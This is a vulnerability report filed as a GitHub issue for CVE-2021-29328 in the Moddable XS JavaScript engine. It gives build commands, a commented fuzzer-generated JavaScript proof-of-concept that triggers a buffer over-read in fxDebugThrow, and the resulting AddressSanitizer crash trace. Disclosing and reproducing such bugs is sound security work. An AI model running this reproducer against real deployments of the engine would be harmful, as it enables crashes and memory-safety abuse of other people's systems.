CVE-2021-29328: over access(fxEnvironmentGetProperty) · Issue #585 · Moddable-OpenSource/moddable
OpenSource Moddable v10.5.0 was discovered to contain a buffer over-read in the fxDebugThrow function at /moddable/xs/sources/xsDebug.c.
operating system: ubuntu18.04
compile command: cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
/**
 * First stage of the fuzzer-generated reproducer. Returns an empty plain
 * object; every other statement is scaffolding whose only role is to run,
 * in this exact order, before makeOobString() continues.
 * @returns {Object} `obj`, still without own properties (see the
 *   Object.assign note below).
 */
function getHiddenValue() {
var obj = {};
var nEmw = new RegExp(null);
var oob = 'value';
// `str` is a hoisted `var` (declared further down), so it is still
// undefined here; eval of a non-string returns its argument unchanged,
// so `fun` is undefined at this point.
var fun = eval(str);
nEmw = new Object();
// Object.assign boxes the string target; Object(521) has no own enumerable
// properties, so `oob` ends up as a String wrapper around '0'.
oob = Object.assign('0', Object(521));
var str = 'new String(\'\')';
// From here on `fun` is a String wrapper around the empty string.
var fun = eval(str);
// Local to this function. NOT the global `let` of the same name that the
// nested helper in makeOobString() reads.
let protoWithIndexedAccessors = {};
var j = [];
// An empty String wrapper has no own enumerable properties (`length` is
// non-enumerable), so `obj` is left unchanged.
Object.assign(obj, fun);
var fun = eval(str);
return obj;
}
/**
 * Second stage of the reproducer. Sets up a few locals, then calls the
 * nested `helper`, which reads the global `protoWithIndexedAccessors`.
 * When the top-level script first calls makeOobString() the global `let`
 * on the last script line has not been initialised yet, so that read is a
 * temporal-dead-zone access and, per the language, should raise a
 * ReferenceError. The ASAN report below shows the engine faulting while
 * reporting that throw (fxEnvironmentGetProperty -> fxThrowMessage ->
 * fxDebugThrow); the throw path, not the script's own logic, is where the
 * over-read is reported.
 * Parameters are ignored: the recursive call passes two arguments that this
 * function never reads.
 * @returns {Array} `oobString`, the array created by `helper`, if no
 *   exception is thrown (not reached in the crashing run).
 */
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = 'constructor';
var extern_arr_vars = [];
let i = 0;
var ijjkkk = 0;
// Overwrites the string with the boolean `true` (0 < 100000).
str = ijjkkk < 100000;
// Nested, function-scoped helper: it closes over this function's `ijjkkk`
// and is not visible at top level, so the top-level `helper(oobString)`
// call later in the script cannot resolve it.
function helper(i) {
let a = new Array();
var extern_arr_vars = [];
if (ijjkkk < 100000) {
// `protoWithIndexedAccessors` is not declared in this function or in
// makeOobString(), so it resolves to the global `let` — see the function
// comment. Presumably the engine raises the TDZ ReferenceError here; if it
// did not, this call would recurse without bound.
makeOobString(a, protoWithIndexedAccessors);
}
return a;
// Unreachable: follows the return.
var oobString = makeOobString();
}
var j = [];
// eval(true) returns true, so `fun` is the boolean `true`.
var fun = eval(str);
// Boxes `true`; Object() ignores its second argument.
Object(fun, hiddenValue);
// In the crashing run the throw originates inside this call.
var oobString = helper();
// Not reached in the crashing run. Note this `var` re-declares the
// `ijjkkk` that `helper` reads.
for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
fun = makeOobString();
}
return oobString;
}
// Top-level driver. The first call enters helper() while the global `let`
// on the last line is still uninitialised; the ASAN trace below shows the
// engine faulting in fxDebugThrow while reporting the throw raised from
// fxEnvironmentGetProperty. Nothing after the first line runs in the
// crashing case: the second call would meet the same condition, `helper`
// is a function nested inside makeOobString() and is not defined in global
// scope, and the `let` is only initialised on the final line.
var oobString = makeOobString();
var oobString = makeOobString();
helper(oobString);
let protoWithIndexedAccessors = {};
ASAN:SIGSEGV
=================================================================
==5974==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3b90c5ec8a (pc 0x0000004cbf37 bp 0x7ffe0703b1f0 sp 0x7ffe0703b1c0 T0)
#0 0x4cbf36 in fxDebugThrow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784
#1 0x42068e in fxThrowMessage /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1251
#2 0x655dea in fxEnvironmentGetProperty /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsType.c:1147
#3 0x5d5e64 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2133
#4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
#5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
#6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
#7 0x7f4b855bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 fxDebugThrow
==5974==ABORTING